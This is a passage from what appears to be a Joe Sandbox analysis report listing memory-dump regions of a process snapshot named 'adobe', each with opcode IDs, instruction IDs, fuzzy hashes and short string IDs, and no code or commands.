                                    • Instruction Fuzzy Hash: B33113B1D00248AFDB14CFE9C584BEEBBB5AF48304F24802AE405B7694D7759888CF50
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1818441475.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_8aa0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: $F6A
                                    • API String ID: 0-4072994420
                                    • Opcode ID: 8064a6298149774e372e56f16fb0e73939b64a07c997d452dae9d3d4c6b76650
                                    • Instruction ID: f3c782cbff89eda8613098bf79a10ae598e4447e19d4a56766ca7084862a1318
                                    • Opcode Fuzzy Hash: 8064a6298149774e372e56f16fb0e73939b64a07c997d452dae9d3d4c6b76650
                                    • Instruction Fuzzy Hash: 9531D2B4D01228DFEB20DF99D585BCEBFF5AB08315F24841AE404BB650C7B96885CFA5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1818441475.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_8aa0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: $F6A
                                    • API String ID: 0-4072994420
                                    • Opcode ID: ba7e8eb50f49417b8ce9359f04e2e10a11a53a992fa471d18c0d7b15198e2af2
                                    • Instruction ID: 3c6fb7db096e16367a98c9b4f070630f95ab1ef5f118eb2a9b55ecddff247077
                                    • Opcode Fuzzy Hash: ba7e8eb50f49417b8ce9359f04e2e10a11a53a992fa471d18c0d7b15198e2af2
                                    • Instruction Fuzzy Hash: 9F31D3B0D01228DFDB20DF99C588B9EBFF5EB08714F24845AE404BB650C7B56885CFA4
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1818441475.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_8aa0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 8oq
                                    • API String ID: 0-3198120224
                                    • Opcode ID: 36102c9690c2e4967606af6c4a093d7931b8be1959d52a7f0db8ba171a72e440
                                    • Instruction ID: a21599a582971d3736f54b0e6c235187e0ab1694a3f91c576c59aae515d7f3bc
                                    • Opcode Fuzzy Hash: 36102c9690c2e4967606af6c4a093d7931b8be1959d52a7f0db8ba171a72e440
                                    • Instruction Fuzzy Hash: 7F11C1793042108FC705AB69E991E9F77FAEBC9212B14902EE50AD7655CF258C07CFA1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1818441475.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_8aa0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: Tekq
                                    • API String ID: 0-2319236580
                                    • Opcode ID: 81998c0d8e8d9297ee6678d8c623a414e3cf765744a3823f8cf45fd30d1aa81a
                                    • Instruction ID: 9bd1412b5899427c226d9a4868098c12d9558a8d8c0e761a0a45a238f3a361f7
                                    • Opcode Fuzzy Hash: 81998c0d8e8d9297ee6678d8c623a414e3cf765744a3823f8cf45fd30d1aa81a
                                    • Instruction Fuzzy Hash: 3B115A71B0021A8BCB15EBB999006EFB7F6AF88311B20407DC505E7754EB36AE01CBE5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1818441475.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_8aa0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: $F6A
                                    • API String ID: 0-4072994420
                                    • Opcode ID: f01fd801316daa8355b90ca405085f89283e5447dde2853ea862f78af99631a2
                                    • Instruction ID: 615d4df27f3c96ec836a4df6304c0aa5a288c041c47a7237646fc2799721d78c
                                    • Opcode Fuzzy Hash: f01fd801316daa8355b90ca405085f89283e5447dde2853ea862f78af99631a2
                                    • Instruction Fuzzy Hash: EB2103B5900249DFCB20CF9AD884BDEBBF4FB48320F10841AE918A7610C375A954CFA5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1818441475.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_8aa0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: Tekq
                                    • API String ID: 0-2319236580
                                    • Opcode ID: 878c9712b074b7a377cb2036f296120806bb4cfa8109d7ed34fd9a138e0b90d6
                                    • Instruction ID: 8f06ac638591ca2404efee1282162a8474bf59aeb4e9898280d9f249512d2281
                                    • Opcode Fuzzy Hash: 878c9712b074b7a377cb2036f296120806bb4cfa8109d7ed34fd9a138e0b90d6
                                    • Instruction Fuzzy Hash: 9D011D763001008FCB44EB79D599A5AB7E7EFC8710724952DE606C7366CE71EC068B50
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1818441475.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_8aa0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: Tekq
                                    • API String ID: 0-2319236580
                                    • Opcode ID: 81a93c4dcdf089f3371e6df6fa529691926b55876796db5430eb9f51bf18d3b2
                                    • Instruction ID: cb773985af63e8fb8291edf6d73c16075c25fcef53efbf6865eefea419048e92
                                    • Opcode Fuzzy Hash: 81a93c4dcdf089f3371e6df6fa529691926b55876796db5430eb9f51bf18d3b2
                                    • Instruction Fuzzy Hash: F0016D763001008FCB44EB79D599A6AB7E6AFC9710724942DE206CB36ACE31EC0A8B50
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1818441475.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_8aa0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: ae0a3503ef6c26c910e2b5b75bd5c31cf670aa30baed7b862bf044cba2e31be3
                                    • Instruction ID: 2f729637125ca84fbf8f0dedd959e5f89b7f5d0988a663632f5a52e7a2d2e3d2
                                    • Opcode Fuzzy Hash: ae0a3503ef6c26c910e2b5b75bd5c31cf670aa30baed7b862bf044cba2e31be3
                                    • Instruction Fuzzy Hash: DF916A747006008FC345AB78D595BAEBBF6EBC9301F10952DE51A9B348DF34A947CB91
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1818441475.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_8aa0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 05677f072152c720ca1e8a9302a10f76472135a1d15488dbcb056733da620f47
                                    • Instruction ID: 96e9fb239b3898f466dd5461bead5fc6e6a78213457e7fe10f9ffa07036a70e1
                                    • Opcode Fuzzy Hash: 05677f072152c720ca1e8a9302a10f76472135a1d15488dbcb056733da620f47
                                    • Instruction Fuzzy Hash: FD9169747006008FC345AB78D594BAEBBF6EBC9301F10952DE91A9B388DF34A947CB91
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1818441475.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_8aa0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: b43a6a91cc02221c36c78ab7d3b8b5e9e62bdb0bb1e5f6b4f5970bc2901013b7
                                    • Instruction ID: 20c60b68198e375d1f50b13581ba1952312ff3d85525162c222b9b793e7ccf4f
                                    • Opcode Fuzzy Hash: b43a6a91cc02221c36c78ab7d3b8b5e9e62bdb0bb1e5f6b4f5970bc2901013b7
                                    • Instruction Fuzzy Hash: A7510B74D16209DFCB00CFA8D584AFEBBB4FB0D682B015466E856B7B15DB389811CF60
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1818441475.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_8aa0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 845ebb6fc9f1da83bd8081def821b5926de579daadf5355e9541a82d900dd281
                                    • Instruction ID: 7f89545a58961a3d52ec56dcb5a271b7ed4aed9a26a3db70a24236d2621c638f
                                    • Opcode Fuzzy Hash: 845ebb6fc9f1da83bd8081def821b5926de579daadf5355e9541a82d900dd281
                                    • Instruction Fuzzy Hash: 19510A74E16209DFCB00CFA9D584AFEBBB4FB4D682F105466E816A7B15DB389811CF60
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1818441475.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_8aa0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: c4a79be92396d965134ddee956e5a410ac7e793468d6ae667c8559e9bb36fe6d
                                    • Instruction ID: fa3de46ff29eeb4bb7a6de4f4f1a57928e795cd7b3b3c4f019bae6e53e9801f8
                                    • Opcode Fuzzy Hash: c4a79be92396d965134ddee956e5a410ac7e793468d6ae667c8559e9bb36fe6d
                                    • Instruction Fuzzy Hash: FB41C278D49218DFDB10CFA9D484AEEBFF5BB4A302F186019E82AB7A51D7349945CB10
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1818441475.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_8aa0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: a45eff248b3f1813e288201e19e38452e2a2976dad8745ecf71308bbe67afb8a
                                    • Instruction ID: abf67d2bf01599bb30f5a218c4cb212e35e15de0c175e00e85af8796ada87138
                                    • Opcode Fuzzy Hash: a45eff248b3f1813e288201e19e38452e2a2976dad8745ecf71308bbe67afb8a
                                    • Instruction Fuzzy Hash: C9418174A09214CFD704CF59D584AF9BBF8FF4E311B41A4A5E0299BA22D7349815CB40
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1818441475.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_8aa0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: befc61a023c1759386319fc946d46397ee63243f89f4f2edf77e1dba7fd2e2e0
                                    • Instruction ID: 86c26d756d6d253058f4bfd0d7bd8260463aaee1f2561a0d9ae91303d4ab9b07
                                    • Opcode Fuzzy Hash: befc61a023c1759386319fc946d46397ee63243f89f4f2edf77e1dba7fd2e2e0
                                    • Instruction Fuzzy Hash: 8F414B74A09615CFD704CF9AD584BBABBF8FF8D701B41A4A5D0299BA26DB349810CF40
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1818441475.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_8aa0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: f8f05a1ce1c504541048b75ccecce77f0aefb6a760c48337d9352bb8d3445045
                                    • Instruction ID: df0c3659eea8c81c6d15203268a58e3ab58273df48cf06ebdeaeada6b30983cc
                                    • Opcode Fuzzy Hash: f8f05a1ce1c504541048b75ccecce77f0aefb6a760c48337d9352bb8d3445045
                                    • Instruction Fuzzy Hash: 14415FB5A002098FDB44EBA4D981BEEBBF6FB88311F109029E615B7745DB345D06CFA1
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1818441475.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_8aa0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 0763b482eb7f6836db991acb923a7638dd364f0fa2e349a79bc6fae31a789c8c
                                    • Instruction ID: 477aa27660837dbc867c4760a4c67527de3fc984df5dd4e43f47b17e1e03e3e1
                                    • Opcode Fuzzy Hash: 0763b482eb7f6836db991acb923a7638dd364f0fa2e349a79bc6fae31a789c8c
                                    • Instruction Fuzzy Hash: BA417731A00609DFCB18DBA4D5947EDBBB6FF88301F14842DE502A77A4EF749946CB51
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1818441475.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_8aa0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 434e10e7efa76a511672003f0da7e3d85f7e6d551e2f11359dbe32d18b962aae
                                    • Instruction ID: 7fa7fa77e4ed312b2eb9631576da59afd144ca0c92b461e6e179d4e984582aa1
                                    • Opcode Fuzzy Hash: 434e10e7efa76a511672003f0da7e3d85f7e6d551e2f11359dbe32d18b962aae
                                    • Instruction Fuzzy Hash: D03130B5B002099FDB44EBA5C981BAEBBF6FB88311F109028E615B7744CB345D02CBA1
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1818441475.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_8aa0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 3466b9517fde15e4035094ca136f85b1c19f52b2e5f34a3446c35f1cfb82ada6
                                    • Instruction ID: 84351064279f677070772643d79dc5e06e996d398b37a2b4f787344f3fe84d64
                                    • Opcode Fuzzy Hash: 3466b9517fde15e4035094ca136f85b1c19f52b2e5f34a3446c35f1cfb82ada6
                                    • Instruction Fuzzy Hash: A521F175A002555FCB11EF789850BFFBBFAEBC8220B14452AE409D7B41EB309D0AC7A1
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1812516364.0000000000EDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EDD000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_edd000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 88e3a888fb18e0b1e28a83af47daa0e579696fb9a7f0da67d70a38bc03f99d06
                                    • Instruction ID: 436ae8d1d027f8fdc4ecce67c9234ac24de1928e266e0de1e14f9e76a5a9fc9a
                                    • Opcode Fuzzy Hash: 88e3a888fb18e0b1e28a83af47daa0e579696fb9a7f0da67d70a38bc03f99d06
                                    • Instruction Fuzzy Hash: 57210471548204DFCB05DF14D9C4B2ABBA5FB84318F24C56EE8095F396C376D847CA62
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1812516364.0000000000EDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EDD000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_edd000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 26912b30633a1335358f0d176e9da1fd7594f7bb9995fe2cd6e7ab386c670317
                                    • Instruction ID: bd2921cd1e6100b919bc2145dedb1c421ffc89b912dfdccf58eb72ccefaa1d71
                                    • Opcode Fuzzy Hash: 26912b30633a1335358f0d176e9da1fd7594f7bb9995fe2cd6e7ab386c670317
                                    • Instruction Fuzzy Hash: 18210471508304DFCB05DF54C9C0B26BBA5FB84318F20C56EE8495B366C336D847CA61
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1818441475.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_8aa0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: addcaec36aacf0cba5a1f03ced7825c9d63935eeb58b582c1fb9cc837ff4d093
                                    • Instruction ID: 1007396be1cee4cf65bf425ad0995d834853d49f6c05ac2e45b1484318b37169
                                    • Opcode Fuzzy Hash: addcaec36aacf0cba5a1f03ced7825c9d63935eeb58b582c1fb9cc837ff4d093
                                    • Instruction Fuzzy Hash: 22212E306443049FC7159B64C951B9E3F75EF46302F24809AD1029BB92DB3A8C06CB92
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1818441475.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_8aa0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: fdd99736760add08b86460459b065ba575e25f02690e575dcdaff27c243519ce
                                    • Instruction ID: 560285dcb1d4b3cc68a3a2046f959f8e9546278b3313585a47723affdbf01029
                                    • Opcode Fuzzy Hash: fdd99736760add08b86460459b065ba575e25f02690e575dcdaff27c243519ce
                                    • Instruction Fuzzy Hash: BA1101B1A09388DFCB06DF7488669AD7FF8AF4620071448EAD845C7643EA349D02C762
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1818441475.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_8aa0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 8014cf7bd0e24a2f40143b1caf2d54659b99c160dc3491eec147c806ac6bbf06
                                    • Instruction ID: b4ba8471240444f287182b42d8247c7214ceda131dacf61517fc5fac8b955b50
                                    • Opcode Fuzzy Hash: 8014cf7bd0e24a2f40143b1caf2d54659b99c160dc3491eec147c806ac6bbf06
                                    • Instruction Fuzzy Hash: D411A0B1900229EFDB14DF69D8043EEBBF1BF49322F20826AE418AB950D7744985CBD0
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1818441475.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_8aa0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 32b0d03d78374f34ef300d621628c8f496dbdf85709a2bccd0ef9a0e05839fae
                                    • Instruction ID: 8c3cd82369a29d9da626ed234e3ba569d78cd266921fcbfcdaf4942244608ea3
                                    • Opcode Fuzzy Hash: 32b0d03d78374f34ef300d621628c8f496dbdf85709a2bccd0ef9a0e05839fae
                                    • Instruction Fuzzy Hash: CA11C674E05209CBDB14CFA5C4447FDFBB6AF49302F15D16AC42967A51DB78490ACF81
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1812516364.0000000000EDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EDD000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_edd000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                    • Instruction ID: 6791f101f0b13c08c7975fa87533ffe2c47fce29d7b08236877d8b273fed6394
                                    • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                    • Instruction Fuzzy Hash: 16119D75508280DFDB06CF54D9C4B15BFB1FB84318F24C6AAD8494B766C33AD85ACBA1
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1812516364.0000000000EDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EDD000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_edd000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                    • Instruction ID: 90f2ec2660ec49db48eeb5ce053792fe9c42f49aeb98b5fb882f5bfbac1bf468
                                    • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                    • Instruction Fuzzy Hash: CF11BE75508240CFCB02CF14D9C4B15BF61FB84318F24C6AAD8094B756C33AE84BCB51
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1818441475.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_8aa0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 7be923df0614f97cf38e303847d9ea6f30289cc3b9d614fffc76d067ce6f81cf
                                    • Instruction ID: a6b3fb139c132b3059689ea350720c52df5210f604e119f7c9ed055777b3647d
                                    • Opcode Fuzzy Hash: 7be923df0614f97cf38e303847d9ea6f30289cc3b9d614fffc76d067ce6f81cf
                                    • Instruction Fuzzy Hash: 8001D234B042008FD7159F54DA82F9E3772EB85613F24809DE5166BFA5CB3A8802CB82
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1818441475.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_8aa0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: a333df272fed5a2592f11ba0fde8be36afd7fd0462072e26fa6958cc5e71f48a
                                    • Instruction ID: 50220c503748aabc4853eadbffd1e832d8c4228bf6816d638bb9be23b24136dc
                                    • Opcode Fuzzy Hash: a333df272fed5a2592f11ba0fde8be36afd7fd0462072e26fa6958cc5e71f48a
                                    • Instruction Fuzzy Hash: A411C434D0A354CBDB05CFA5C4047FEBBBAAF8A302F04D06AD41967652DB784948CF91
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1812460530.0000000000ECD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ECD000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_ecd000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 698edf6b44b9cac440074332bc3adef2c281f95fa57229bf238db5a4ae6cfca5
                                    • Instruction ID: d66dc98561e73b4d26bf3f3ba37b7a4fb6269b711463112f87a779b4215d09d3
                                    • Opcode Fuzzy Hash: 698edf6b44b9cac440074332bc3adef2c281f95fa57229bf238db5a4ae6cfca5
                                    • Instruction Fuzzy Hash: 0301A73100C3449AE7109A29CE84BA7BFD8EF51324F18D43FED096A296C77B9C41C671
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1818441475.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_8aa0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: e195b18a82024ba6ada6fa9c3c3c871382fc3ab4c1d051273db69232754d7864
                                    • Instruction ID: 06ade9d6551a58bce4baa8b70ab6b86f86d0c5f051716ae13dd8b79a4201ca8d
                                    • Opcode Fuzzy Hash: e195b18a82024ba6ada6fa9c3c3c871382fc3ab4c1d051273db69232754d7864
                                    • Instruction Fuzzy Hash: 0B017C30E05209CBDB08CFA6C404BBEFBBAAB89701F00D02AD81967B51DBB84904CF80
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1818441475.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_8aa0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: dc829c95dbaa76e79bde2e187dde903dbb395bfe4a68e5739232fb2a02af9390
                                    • Instruction ID: af95b00e30480b2ccbdef2dd9e99474826dadf016b8423ec05f15e3ee16391e1
                                    • Opcode Fuzzy Hash: dc829c95dbaa76e79bde2e187dde903dbb395bfe4a68e5739232fb2a02af9390
                                    • Instruction Fuzzy Hash: 61F01234E0925ACBCF20CF94E4407FFBBB9AF49217F146415E425E3E52E7319A668B50
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1818441475.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_8aa0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 77e80e2daa74c5a566332d3a0f0ce483b0309d81541d5108828360def56462b0
                                    • Instruction ID: 8f173d554d634befc57b6383093e109e71e9728cc20bb773c2cc1764d1cda396
                                    • Opcode Fuzzy Hash: 77e80e2daa74c5a566332d3a0f0ce483b0309d81541d5108828360def56462b0
                                    • Instruction Fuzzy Hash: DFF06DB57002005BC20477A8D596FAE37FAE7D5626F649429B509D738CCE298C07CB91
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1812460530.0000000000ECD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ECD000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_ecd000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 16fd05e4c2feffe7cea53fe341c331bbcf572d3ccf808930c0301f6209989819
                                    • Instruction ID: b1ccf8d080f5bb7d87c891a74f2b67d5a4a8975155060715635db6f6fd3b663c
                                    • Opcode Fuzzy Hash: 16fd05e4c2feffe7cea53fe341c331bbcf572d3ccf808930c0301f6209989819
                                    • Instruction Fuzzy Hash: 0BF06271408344AEE7208A1ACD84B66FFE8EB51738F18C46AED085E296C37A9C45CA71
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1818441475.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_8aa0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: a8b0746e79d1b38532eb41c917a8c7726b1e288860bc0360731c576b2f75dd55
                                    • Instruction ID: 74f4cd04f5769ad1e25074f9dddc1c7ff25e25f303e6644f0bf5af29acba1d7f
                                    • Opcode Fuzzy Hash: a8b0746e79d1b38532eb41c917a8c7726b1e288860bc0360731c576b2f75dd55
                                    • Instruction Fuzzy Hash: 82F0BE32204118AFCB19DFA8E840ADE7FF6EF0D210B1480ABE084C7221E330AA42C754
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1818441475.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_8aa0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: e17054a1888a811c3aa017782a948dcb9c73fc5061c4b978cb08028b2f4abab1
                                    • Instruction ID: 9aa5fea387c9afd0afcbaefb52e4e9ac586b9e872742c5dee8c651495ce37ca5
                                    • Opcode Fuzzy Hash: e17054a1888a811c3aa017782a948dcb9c73fc5061c4b978cb08028b2f4abab1
                                    • Instruction Fuzzy Hash: 0101FBB0800229DFDB18DF6AC4043EEBAF1BF48351F10C229E429ABA90D7B45A44CF90
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1818441475.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_8aa0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: c907025d9011972f40b81db25ca261b777827b02132c8417cef95eb8ea993b2d
                                    • Instruction ID: 903cc45b8c473138900e762230e7ea08b73efa2bf3c3ab184016dc8210e6a72a
                                    • Opcode Fuzzy Hash: c907025d9011972f40b81db25ca261b777827b02132c8417cef95eb8ea993b2d
                                    • Instruction Fuzzy Hash: D5F054747002044BC24477A8D555F5F36FAE7D5765B505429B5059734CCE358C03CB91
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1818441475.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_8aa0000_adobe.jbxd
